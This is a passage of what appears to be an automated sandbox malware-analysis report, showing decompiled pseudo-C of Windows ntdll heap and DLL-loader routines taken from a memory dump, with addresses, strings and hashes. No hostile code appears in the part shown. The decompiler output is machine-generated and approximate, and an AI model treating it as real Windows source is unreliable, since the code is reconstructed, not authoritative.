                                                                                                                              0x1d79e32b
                                                                                                                              0x1d73f788
                                                                                                                              0x1d73f78e
                                                                                                                              0x1d73f79e
                                                                                                                              0x1d73f7a5
                                                                                                                              0x1d73f7b7
                                                                                                                              0x1d73f7bc
                                                                                                                              0x1d73f7c0
                                                                                                                              0x1d79e419
                                                                                                                              0x1d79e41f
                                                                                                                              0x1d79e423
                                                                                                                              0x1d79e442
                                                                                                                              0x1d79e447
                                                                                                                              0x1d79e425
                                                                                                                              0x1d79e43a
                                                                                                                              0x1d79e43f
                                                                                                                              0x1d79e44d
                                                                                                                              0x1d79e450
                                                                                                                              0x1d79e453
                                                                                                                              0x1d79e45a
                                                                                                                              0x1d73f7c6
                                                                                                                              0x1d73f7c6
                                                                                                                              0x1d73f7cb
                                                                                                                              0x1d73f7d2
                                                                                                                              0x1d79e33d
                                                                                                                              0x1d73f7d8
                                                                                                                              0x1d73f7d8
                                                                                                                              0x1d73f7d8
                                                                                                                              0x1d73f7dd
                                                                                                                              0x1d79e347
                                                                                                                              0x1d79e34d
                                                                                                                              0x1d79e354
                                                                                                                              0x1d79e364
                                                                                                                              0x1d79e364
                                                                                                                              0x1d79e354
                                                                                                                              0x1d73f7e3
                                                                                                                              0x1d73f7ec
                                                                                                                              0x1d73f7f2
                                                                                                                              0x1d73f7f8
                                                                                                                              0x1d73f805
                                                                                                                              0x1d79e377
                                                                                                                              0x1d73f80b
                                                                                                                              0x1d73f80b
                                                                                                                              0x1d73f80b
                                                                                                                              0x1d73f810
                                                                                                                              0x1d79e381
                                                                                                                              0x1d79e387
                                                                                                                              0x1d79e38e
                                                                                                                              0x1d79e399
                                                                                                                              0x1d79e39b
                                                                                                                              0x1d79e3a6
                                                                                                                              0x1d79e3a6
                                                                                                                              0x1d79e3a6
                                                                                                                              0x1d79e3c3
                                                                                                                              0x1d79e3c3
                                                                                                                              0x1d79e38e
                                                                                                                              0x1d73f816
                                                                                                                              0x1d73f81b
                                                                                                                              0x1d73f822
                                                                                                                              0x1d79e3d6
                                                                                                                              0x1d73f828
                                                                                                                              0x1d73f828
                                                                                                                              0x1d73f828
                                                                                                                              0x1d73f82d
                                                                                                                              0x1d79e3e5
                                                                                                                              0x1d79e3e7
                                                                                                                              0x1d79e3f2
                                                                                                                              0x1d79e3f2
                                                                                                                              0x1d79e3f2
                                                                                                                              0x1d79e40f
                                                                                                                              0x1d79e40f
                                                                                                                              0x1d73f838
                                                                                                                              0x1d73f83a
                                                                                                                              0x1d73f83a
                                                                                                                              0x1d73f7c0
                                                                                                                              0x1d73f7a5
                                                                                                                              0x1d73f841
                                                                                                                              0x1d73f84b
                                                                                                                              0x1d73f84e
                                                                                                                              0x1d73f851
                                                                                                                              0x00000000
                                                                                                                              0x1d73f851
                                                                                                                              0x1d73f857

                                                                                                                              Strings
                                                                                                                              • HEAP: , xrefs: 1D79E442
                                                                                                                              • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 1D79E455
                                                                                                                              • HEAP[%wZ]: , xrefs: 1D79E435
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                              • API String ID: 0-1340214556
                                                                                                                              • Opcode ID: 045f85121a7724260f7863e1269b0807548ff88ddfda433425dda7a4d6b3300d
                                                                                                                              • Instruction ID: 156979eaa46bd74d4d0c58430e20efc0b17f7dba0921b870b4369d32f182cb1f
                                                                                                                              • Opcode Fuzzy Hash: 045f85121a7724260f7863e1269b0807548ff88ddfda433425dda7a4d6b3300d
                                                                                                                              • Instruction Fuzzy Hash: E951F436644684FFE716CB64D884BAAFBF8FF04664F0544A6E5848B6A2D734E900C752
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D761514 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 98%
                                                                                                                              			E1D761514(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _t66;
				signed int _t69;
				void* _t73;
				signed int _t75;
				char* _t78;
				intOrPtr _t79;
				signed int _t80;
				char* _t83;
				intOrPtr _t84;
				signed int _t85;
				signed int _t92;
				signed char* _t93;
				signed char _t98;
				intOrPtr _t103;
				signed int _t104;
				void* _t107;
				signed int _t118;
				intOrPtr _t119;
				intOrPtr _t120;

				_t103 = __edx;
				_v8 = __ecx;
				_t118 = 0;
				_t119 =  *((intOrPtr*)(__ecx + 0x20));
				_v16 = __edx;
				_t107 = E1D74DE20(__ecx, __eflags,  *((intOrPtr*)(_t119 + 0x18)), 1, 0xe,  &_v20);
				if(_t107 != 0) {
					_t66 = _v8;
					__eflags =  *(_t66 + 0x10) & 0x00800000;
					if(( *(_t66 + 0x10) & 0x00800000) != 0) {
						L19:
						_t118 = 0xc000007b;
						L6:
						return _t118;
					}
					_t69 =  *(_t119 + 0x34) | 0x00400000;
					 *(_t119 + 0x34) = _t69;
					__eflags =  *(_t107 + 0x10) & 0x00000001;
					if(__eflags == 0) {
						goto L1;
					}
					 *(_t119 + 0x34) = _t69 | 0x01000000;
					_t118 = E1D736DD0( *((intOrPtr*)(_t119 + 0x18)), __eflags);
					__eflags = _t118;
					if(_t118 < 0) {
						goto L6;
					} else {
						goto L1;
					}
					goto L19;
				}
				L1:
				if(( *(_t103 + 0x16) & 0x00002000) == 0) {
					 *(_t119 + 0x34) =  *(_t119 + 0x34) & 0xfffffffb;
					goto L6;
				}
				if(( *( *((intOrPtr*)(_t119 + 0x5c)) + 0x10) & 0x00000080) != 0) {
					__eflags =  *(_t103 + 0x5e) & 0x00000080;
					if(( *(_t103 + 0x5e) & 0x00000080) != 0) {
						goto L3;
					}
					_t98 =  *0x1d8337c0; // 0x0
					__eflags = _t98 & 0x00000003;
					if((_t98 & 0x00000003) != 0) {
						_t45 = _t119 + 0x24; // 0x123
						E1D7BE692("minkernel\\ntdll\\ldrmap.c", 0x3a2, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t45);
						_t98 =  *0x1d8337c0; // 0x0
					}
					__eflags = _t98 & 0x00000010;
					if((_t98 & 0x00000010) != 0) {
						asm("int3");
					}
					_t118 = 0xc0000428;
					goto L6;
				}
				L3:
				if(( *(_t119 + 0x34) & 0x01000000) != 0) {
					goto L6;
				}
				_t73 = _a4 - 0x40000003;
				if(_t73 == 0 || _t73 == 0x33) {
					_v12 =  *((intOrPtr*)(_t119 + 0x18));
					_t75 = E1D753C40();
					__eflags = _t75;
					if(_t75 != 0) {
						_t78 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t78 = 0x7ffe0384;
					}
					__eflags =  *_t78;
					_t104 = 0x7ffe0385;
					if( *_t78 != 0) {
						_t79 =  *[fs:0x30];
						__eflags =  *(_t79 + 0x240) & 0x00000004;
						if(( *(_t79 + 0x240) & 0x00000004) != 0) {
							_t92 = E1D753C40();
							__eflags = _t92;
							if(_t92 == 0) {
								_t93 = 0x7ffe0385;
							} else {
								_t93 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t93 & 0x00000020;
							if(( *_t93 & 0x00000020) != 0) {
								E1D7C0227(0x1490, _v12, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					__eflags = _a4 - 0x40000003;
					if(_a4 != 0x40000003) {
						L12:
						_t120 =  *((intOrPtr*)(_t119 + 0x18));
						_t80 = E1D753C40();
						__eflags = _t80;
						if(_t80 != 0) {
							_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t83 = 0x7ffe0384;
						}
						__eflags =  *_t83;
						if( *_t83 != 0) {
							_t84 =  *[fs:0x30];
							__eflags =  *(_t84 + 0x240) & 0x00000004;
							if(( *(_t84 + 0x240) & 0x00000004) != 0) {
								_t85 = E1D753C40();
								__eflags = _t85;
								if(_t85 != 0) {
									_t104 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
									__eflags = _t104;
								}
								__eflags =  *_t104 & 0x00000020;
								if(( *_t104 & 0x00000020) != 0) {
									E1D7C0227(0x1491, _t120, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						goto L6;
					} else {
						_t21 = _t119 + 0x24; // 0x123
						_v12 = _t21;
						_t118 = E1D77D3EF( *((intOrPtr*)(_t119 + 0x18)),  *((intOrPtr*)(_v8 + 0x5c)), _v16, _t21);
						__eflags = _t118;
						if(_t118 < 0) {
							E1D77C98F(_t118, 0x1490, 0, _v12);
							goto L6;
						}
						goto L12;
					}
				} else {
					goto L6;
				}
			}


























                                                                                                                              0x1d76151f
                                                                                                                              0x1d761523
                                                                                                                              0x1d761526
                                                                                                                              0x1d761528
                                                                                                                              0x1d761536
                                                                                                                              0x1d76153e
                                                                                                                              0x1d761542
                                                                                                                              0x1d7615f5
                                                                                                                              0x1d7615f8
                                                                                                                              0x1d7615ff
                                                                                                                              0x1d7aa34d
                                                                                                                              0x1d7aa34d
                                                                                                                              0x1d76157c
                                                                                                                              0x1d761582
                                                                                                                              0x1d761582
                                                                                                                              0x1d761608
                                                                                                                              0x1d76160d
                                                                                                                              0x1d761610
                                                                                                                              0x1d761614
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7aa35f
                                                                                                                              0x1d7aa367
                                                                                                                              0x1d7aa369
                                                                                                                              0x1d7aa36b
                                                                                                                              0x00000000
                                                                                                                              0x1d7aa371
                                                                                                                              0x00000000
                                                                                                                              0x1d7aa371
                                                                                                                              0x00000000
                                                                                                                              0x1d7aa36b
                                                                                                                              0x1d761548
                                                                                                                              0x1d761551
                                                                                                                              0x1d7aa376
                                                                                                                              0x00000000
                                                                                                                              0x1d7aa376
                                                                                                                              0x1d76155e
                                                                                                                              0x1d7aa37f
                                                                                                                              0x1d7aa383
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7aa389
                                                                                                                              0x1d7aa38e
                                                                                                                              0x1d7aa390
                                                                                                                              0x1d7aa392
                                                                                                                              0x1d7aa3ac
                                                                                                                              0x1d7aa3b1
                                                                                                                              0x1d7aa3b6
                                                                                                                              0x1d7aa3b9
                                                                                                                              0x1d7aa3bb
                                                                                                                              0x1d7aa3bd
                                                                                                                              0x1d7aa3bd
                                                                                                                              0x1d7aa3be
                                                                                                                              0x00000000
                                                                                                                              0x1d7aa3be
                                                                                                                              0x1d761564
                                                                                                                              0x1d76156b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d761570
                                                                                                                              0x1d761575
                                                                                                                              0x1d761588
                                                                                                                              0x1d76158b
                                                                                                                              0x1d761590
                                                                                                                              0x1d761592
                                                                                                                              0x1d7aa3d1
                                                                                                                              0x1d761598
                                                                                                                              0x1d761598
                                                                                                                              0x1d761598
                                                                                                                              0x1d76159d
                                                                                                                              0x1d7615a0
                                                                                                                              0x1d7615a5
                                                                                                                              0x1d7aa3db
                                                                                                                              0x1d7aa3e1
                                                                                                                              0x1d7aa3e8
                                                                                                                              0x1d7aa3ee
                                                                                                                              0x1d7aa3f3
                                                                                                                              0x1d7aa3f5
                                                                                                                              0x1d7aa407
                                                                                                                              0x1d7aa3f7
                                                                                                                              0x1d7aa400
                                                                                                                              0x1d7aa400
                                                                                                                              0x1d7aa409
                                                                                                                              0x1d7aa40c
                                                                                                                              0x1d7aa422
                                                                                                                              0x1d7aa422
                                                                                                                              0x1d7aa40c
                                                                                                                              0x1d7aa3e8
                                                                                                                              0x1d7615ab
                                                                                                                              0x1d7615b2
                                                                                                                              0x1d7615d6
                                                                                                                              0x1d7615d6
                                                                                                                              0x1d7615d9
                                                                                                                              0x1d7615de
                                                                                                                              0x1d7615e0
                                                                                                                              0x1d7aa44b
                                                                                                                              0x1d7615e6
                                                                                                                              0x1d7615e6
                                                                                                                              0x1d7615e6
                                                                                                                              0x1d7615eb
                                                                                                                              0x1d7615ee
                                                                                                                              0x1d7aa455
                                                                                                                              0x1d7aa45b
                                                                                                                              0x1d7aa462
                                                                                                                              0x1d7aa468
                                                                                                                              0x1d7aa46d
                                                                                                                              0x1d7aa46f
                                                                                                                              0x1d7aa47a
                                                                                                                              0x1d7aa47a
                                                                                                                              0x1d7aa47a
                                                                                                                              0x1d7aa480
                                                                                                                              0x1d7aa483
                                                                                                                              0x1d7aa498
                                                                                                                              0x1d7aa498
                                                                                                                              0x1d7aa483
                                                                                                                              0x1d7aa462
                                                                                                                              0x00000000
                                                                                                                              0x1d7615b4
                                                                                                                              0x1d7615b7
                                                                                                                              0x1d7615be
                                                                                                                              0x1d7615cc
                                                                                                                              0x1d7615ce
                                                                                                                              0x1d7615d0
                                                                                                                              0x1d7aa438
                                                                                                                              0x00000000
                                                                                                                              0x1d7aa438
                                                                                                                              0x00000000
                                                                                                                              0x1d7615d0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000

                                                                                                                              Strings
                                                                                                                              • LdrpCompleteMapModule, xrefs: 1D7AA39D
                                                                                                                              • minkernel\ntdll\ldrmap.c, xrefs: 1D7AA3A7
                                                                                                                              • Could not validate the crypto signature for DLL %wZ, xrefs: 1D7AA396
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                              • API String ID: 0-1676968949
                                                                                                                              • Opcode ID: fd08c72c365e1353f6b3d1aa41608c941f865e357d3fd0164f5ec8dc80ed4da8
                                                                                                                              • Instruction ID: f45b7f7b4322f30dfc6c7983e25f19b98450108658b6a3ca32574905b8853c44
                                                                                                                              • Opcode Fuzzy Hash: fd08c72c365e1353f6b3d1aa41608c941f865e357d3fd0164f5ec8dc80ed4da8
                                                                                                                              • Instruction Fuzzy Hash: CC512434A04782DBE712CB58D949B2AB7A0BF04730F144766ED5A8B6E2F734E900CB53
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D741A24 Relevance: 3.9, Strings: 3, Instructions: 148COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 75%
                                                                                                                              			E1D741A24(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t65;
				void* _t68;
				signed int _t69;
				intOrPtr _t70;
				signed int _t71;
				intOrPtr _t83;
				intOrPtr* _t99;
				intOrPtr _t100;
				void* _t101;
				signed int _t115;
				signed int* _t122;
				intOrPtr _t127;
				signed int _t130;
				void* _t135;

				_t100 = __ecx;
				_t99 = __edx;
				_v12 = __ecx;
				 *((intOrPtr*)(__ecx + 0xb4)) = __edx;
				if( *__edx != 0) {
					_t65 =  *((intOrPtr*)(__edx + 4)) -  *((intOrPtr*)(__edx + 0x14));
					__eflags =  *(__edx + 8);
					_t101 = _t65 * 8 - 8;
					if(__eflags == 0) {
						_t101 = _t65 * 4 - 4;
					}
					 *(_t101 +  *((intOrPtr*)(_t99 + 0x20))) =  *(_t101 +  *((intOrPtr*)(_t99 + 0x20))) & 0x00000000;
					asm("btr eax, esi");
					_t100 = _v12;
				}
				_t68 = _t100 + 0xc0;
				_t127 =  *((intOrPtr*)(_t68 + 4));
				while(1) {
					L2:
					_v8 = _t127;
					if(_t68 == _t127) {
						break;
					}
					_t122 = _t127 - 8;
					if( *((intOrPtr*)(_t100 + 0x4c)) != 0) {
						 *_t122 =  *_t122 ^  *(_t100 + 0x50);
						if(_t122[0] != (_t122[0] ^ _t122[0] ^  *_t122)) {
							_push(_t100);
							E1D7FD646(_t99, _t100, _t122, _t122, _t127, __eflags);
							_t100 = _v12;
						}
					}
					_t115 =  *_t122 & 0x0000ffff;
					_t69 = _t99;
					_t135 = _t115 -  *((intOrPtr*)(_t99 + 4));
					while(1) {
						_v20 = _t69;
						if(_t135 < 0) {
							break;
						}
						_t130 =  *_t69;
						_v16 = _t130;
						_t127 = _v8;
						if(_t130 != 0) {
							_t69 = _v16;
							__eflags = _t115 -  *((intOrPtr*)(_t69 + 4));
							continue;
						}
						_v16 =  *((intOrPtr*)(_t69 + 4)) - 1;
						L9:
						if( *_t99 != 0) {
							_t70 =  *((intOrPtr*)(_t99 + 4));
							__eflags = _t115 - _t70;
							_t71 = _t70 - 1;
							__eflags = _t71;
							if(_t71 < 0) {
								_t71 = _t115;
							}
							E1D75036A(_t100, _t99, 1, _t127, _t71, _t115);
						}
						E1D741B5D(_v12, _v20, 1, _t127, _v16,  *_t122 & 0x0000ffff);
						if( *0x1d836960 >= 1) {
							__eflags =  *( *((intOrPtr*)(_v20 + 0x1c)) + (_v16 -  *((intOrPtr*)(_v20 + 0x14)) >> 5) * 4) & 1 << (_v16 -  *((intOrPtr*)(_v20 + 0x14)) & 0x0000001f);
							if(__eflags == 0) {
								_t83 =  *[fs:0x30];
								__eflags =  *(_t83 + 0xc);
								if( *(_t83 + 0xc) == 0) {
									_push("HEAP: ");
									E1D73B910();
								} else {
									E1D73B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))");
								E1D73B910();
								__eflags =  *0x1d835da8;
								if(__eflags == 0) {
									__eflags = 1;
									E1D7FFC95(_t99, 1, _t122, 1);
								}
							}
							_t127 = _v8;
						}
						_t100 = _v12;
						if( *((intOrPtr*)(_t100 + 0x4c)) != 0) {
							_t122[0] = _t122[0] ^ _t122[0] ^  *_t122;
							 *_t122 =  *_t122 ^  *(_t100 + 0x50);
						}
						_t127 =  *((intOrPtr*)(_t127 + 4));
						_t68 = _t100 + 0xc0;
						goto L2;
					}
					_v16 = _t115;
					goto L9;
				}
				return _t68;
			}

























                                                                                                                              0x1d741a24
                                                                                                                              0x1d741a2d
                                                                                                                              0x1d741a2f
                                                                                                                              0x1d741a33
                                                                                                                              0x1d741a3d
                                                                                                                              0x1d741b11
                                                                                                                              0x1d741b14
                                                                                                                              0x1d741b18
                                                                                                                              0x1d741b1f
                                                                                                                              0x1d741b21
                                                                                                                              0x1d741b21
                                                                                                                              0x1d741b2b
                                                                                                                              0x1d741b44
                                                                                                                              0x1d741b4a
                                                                                                                              0x1d741b4a
                                                                                                                              0x1d741a43
                                                                                                                              0x1d741a49
                                                                                                                              0x1d741a4c
                                                                                                                              0x1d741a4c
                                                                                                                              0x1d741a4c
                                                                                                                              0x1d741a51
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d741a5b
                                                                                                                              0x1d741a5e
                                                                                                                              0x1d741a63
                                                                                                                              0x1d741a70
                                                                                                                              0x1d79f908
                                                                                                                              0x1d79f90b
                                                                                                                              0x1d79f910
                                                                                                                              0x1d79f910
                                                                                                                              0x1d741a70
                                                                                                                              0x1d741a76
                                                                                                                              0x1d741a79
                                                                                                                              0x1d741a7b
                                                                                                                              0x1d741a7e
                                                                                                                              0x1d741a7e
                                                                                                                              0x1d741a81
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d741a87
                                                                                                                              0x1d741a8b
                                                                                                                              0x1d741a8e
                                                                                                                              0x1d741a91
                                                                                                                              0x1d741b52
                                                                                                                              0x1d741b55
                                                                                                                              0x00000000
                                                                                                                              0x1d741b55
                                                                                                                              0x1d741a9b
                                                                                                                              0x1d741a9e
                                                                                                                              0x1d741aa1
                                                                                                                              0x1d741af1
                                                                                                                              0x1d741af4
                                                                                                                              0x1d741af6
                                                                                                                              0x1d741af6
                                                                                                                              0x1d741af7
                                                                                                                              0x1d741af9
                                                                                                                              0x1d741af9
                                                                                                                              0x1d741b02
                                                                                                                              0x1d741b02
                                                                                                                              0x1d741ab3
                                                                                                                              0x1d741abf
                                                                                                                              0x1d79f931
                                                                                                                              0x1d79f934
                                                                                                                              0x1d79f936
                                                                                                                              0x1d79f93c
                                                                                                                              0x1d79f940
                                                                                                                              0x1d79f95f
                                                                                                                              0x1d79f964
                                                                                                                              0x1d79f942
                                                                                                                              0x1d79f957
                                                                                                                              0x1d79f95c
                                                                                                                              0x1d79f96a
                                                                                                                              0x1d79f96f
                                                                                                                              0x1d79f974
                                                                                                                              0x1d79f97c
                                                                                                                              0x1d79f980
                                                                                                                              0x1d79f981
                                                                                                                              0x1d79f981
                                                                                                                              0x1d79f97c
                                                                                                                              0x1d79f986
                                                                                                                              0x1d79f986
                                                                                                                              0x1d741ac5
                                                                                                                              0x1d741acc
                                                                                                                              0x1d741ad6
                                                                                                                              0x1d741adc
                                                                                                                              0x1d741adc
                                                                                                                              0x1d741ade
                                                                                                                              0x1d741ae1
                                                                                                                              0x00000000
                                                                                                                              0x1d741ae1
                                                                                                                              0x1d741b09
                                                                                                                              0x00000000
                                                                                                                              0x1d741b09
                                                                                                                              0x1d741af0

                                                                                                                              Strings
                                                                                                                              • HEAP: , xrefs: 1D79F95F
                                                                                                                              • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 1D79F96A
                                                                                                                              • HEAP[%wZ]: , xrefs: 1D79F952
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
                                                                                                                              • API String ID: 0-1596344177
                                                                                                                              • Opcode ID: 55900f5571880c0590afed1cdf69b72fde21d0f989f444bf9b0e65883f6d66e7
                                                                                                                              • Instruction ID: 6bb04897bfbeb724d955f367c8e139727e68e034fd3983f1394a2dba2ebc533e
                                                                                                                              • Opcode Fuzzy Hash: 55900f5571880c0590afed1cdf69b72fde21d0f989f444bf9b0e65883f6d66e7
                                                                                                                              • Instruction Fuzzy Hash: 0151BE35B05151EFC706DF68D484A69BBB1FF45334F26C299D8589B242D730ED41CB92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D73753F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 61%
                                                                                                                              			E1D73753F(signed int __ecx, signed int __edx, intOrPtr _a4) {
				unsigned int _v12;
				signed char _t46;
				signed char _t50;
				intOrPtr* _t52;
				unsigned int _t53;
				signed char _t54;
				signed int _t57;
				signed int _t60;
				intOrPtr _t64;
				intOrPtr* _t66;
				signed int _t67;
				unsigned int _t78;
				signed int _t80;

				_t60 = __edx;
				_t80 = __ecx;
				if(__edx == 0 || (__edx & 0x00000007) != 0) {
					L37:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E1D73B910();
					} else {
						E1D73B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t60 + 8);
					_push(_t80);
					E1D73B910("Invalid address specified to %s( %p, %p )\n", _a4);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1d8347a1 = 1;
						asm("int3");
						 *0x1d8347a1 = 0;
					}
					return 0;
				} else {
					_t46 =  *((intOrPtr*)(__edx + 7));
					if((_t46 & 0x0000003f) == 0) {
						goto L37;
					}
					if(_t46 < 0) {
						if( *((char*)(__ecx + 0xea)) != 2) {
							_t64 = 0;
						} else {
							_t64 =  *((intOrPtr*)(__ecx + 0xe4));
						}
						if(_t64 != 0) {
							if(_t46 != 4) {
								L23:
								return 1;
							}
						}
						goto L37;
					}
					if( *((intOrPtr*)(__ecx + 0x4c)) == 0) {
						L6:
						if( *((char*)(_t60 + 7)) == 4) {
							if((_t60 & 0x00000fff) != 0x18) {
								goto L37;
							}
							L13:
							if( *(_t80 + 0x4c) == 0) {
								_t50 =  *((intOrPtr*)(_t60 + 2));
							} else {
								_t53 =  *_t60;
								if(( *(_t80 + 0x4c) & _t53) != 0) {
									_t53 = _t53 ^  *(_t80 + 0x50);
								}
								_t50 = _t53 >> 0x10;
							}
							if((_t50 & 0x00000004) != 0) {
								if(E1D7ED62C(_t80, _t60) != 0) {
									goto L18;
								}
							} else {
								L18:
								if( *((char*)(_t60 + 7)) == 4) {
									goto L23;
								}
								_t66 = _t80 + 0xa4;
								_t52 =  *_t66;
								while(_t52 != _t66) {
									if(_t60 <  *((intOrPtr*)(_t52 + 0x14)) || _t60 >=  *((intOrPtr*)(_t52 + 0x18))) {
										_t52 =  *_t52;
										continue;
									} else {
										goto L23;
									}
								}
							}
							goto L37;
						}
						_t54 =  *((intOrPtr*)(_t60 + 6));
						if(_t54 == 0) {
							_t67 = _t80;
						} else {
							_t67 = (_t60 & 0xffff0000) - ((_t54 & 0x000000ff) << 0x10) + 0x10000;
						}
						if(_t67 == 0 ||  *((intOrPtr*)(_t67 + 0x18)) != _t80 || _t60 <  *((intOrPtr*)(_t67 + 0x24)) || _t60 >=  *((intOrPtr*)(_t67 + 0x28))) {
							goto L37;
						} else {
							goto L13;
						}
					}
					_t57 =  *__edx;
					_t78 =  *(__ecx + 0x50) ^ _t57;
					_v12 = _t57;
					_v12 = _t78;
					if(_t78 >> 0x18 != (_t78 >> 0x00000010 ^ _t78 >> 0x00000008 ^ _t78)) {
						goto L37;
					}
					goto L6;
				}
			}
















                                                                                                                              0x1d737548
                                                                                                                              0x1d73754b
                                                                                                                              0x1d73754f
                                                                                                                              0x1d79ad1e
                                                                                                                              0x1d79ad28
                                                                                                                              0x1d79ad47
                                                                                                                              0x1d79ad4c
                                                                                                                              0x1d79ad2a
                                                                                                                              0x1d79ad3f
                                                                                                                              0x1d79ad44
                                                                                                                              0x1d79ad55
                                                                                                                              0x1d79ad56
                                                                                                                              0x1d79ad5f
                                                                                                                              0x1d79ad71
                                                                                                                              0x1d79ad73
                                                                                                                              0x1d79ad7a
                                                                                                                              0x1d79ad7b
                                                                                                                              0x1d79ad7b
                                                                                                                              0x00000000
                                                                                                                              0x1d73755e
                                                                                                                              0x1d73755e
                                                                                                                              0x1d737563
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d73756b
                                                                                                                              0x1d737639
                                                                                                                              0x1d737659
                                                                                                                              0x1d73763b
                                                                                                                              0x1d73763b
                                                                                                                              0x1d73763b
                                                                                                                              0x1d737643
                                                                                                                              0x1d73764b
                                                                                                                              0x1d737626
                                                                                                                              0x00000000
                                                                                                                              0x1d737626
                                                                                                                              0x1d73764d
                                                                                                                              0x00000000
                                                                                                                              0x1d737643
                                                                                                                              0x1d737575
                                                                                                                              0x1d73759d
                                                                                                                              0x1d7375a1
                                                                                                                              0x1d79ad06
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7375eb
                                                                                                                              0x1d7375ef
                                                                                                                              0x1d73765d
                                                                                                                              0x1d7375f1
                                                                                                                              0x1d7375f1
                                                                                                                              0x1d7375f6
                                                                                                                              0x1d7375f8
                                                                                                                              0x1d7375f8
                                                                                                                              0x1d7375fb
                                                                                                                              0x1d7375fb
                                                                                                                              0x1d737600
                                                                                                                              0x1d79ad18
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d737606
                                                                                                                              0x1d737606
                                                                                                                              0x1d73760a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d73760c
                                                                                                                              0x1d737612
                                                                                                                              0x1d737614
                                                                                                                              0x1d73761f
                                                                                                                              0x1d73762e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d73761f
                                                                                                                              0x1d737614
                                                                                                                              0x00000000
                                                                                                                              0x1d737600
                                                                                                                              0x1d7375a7
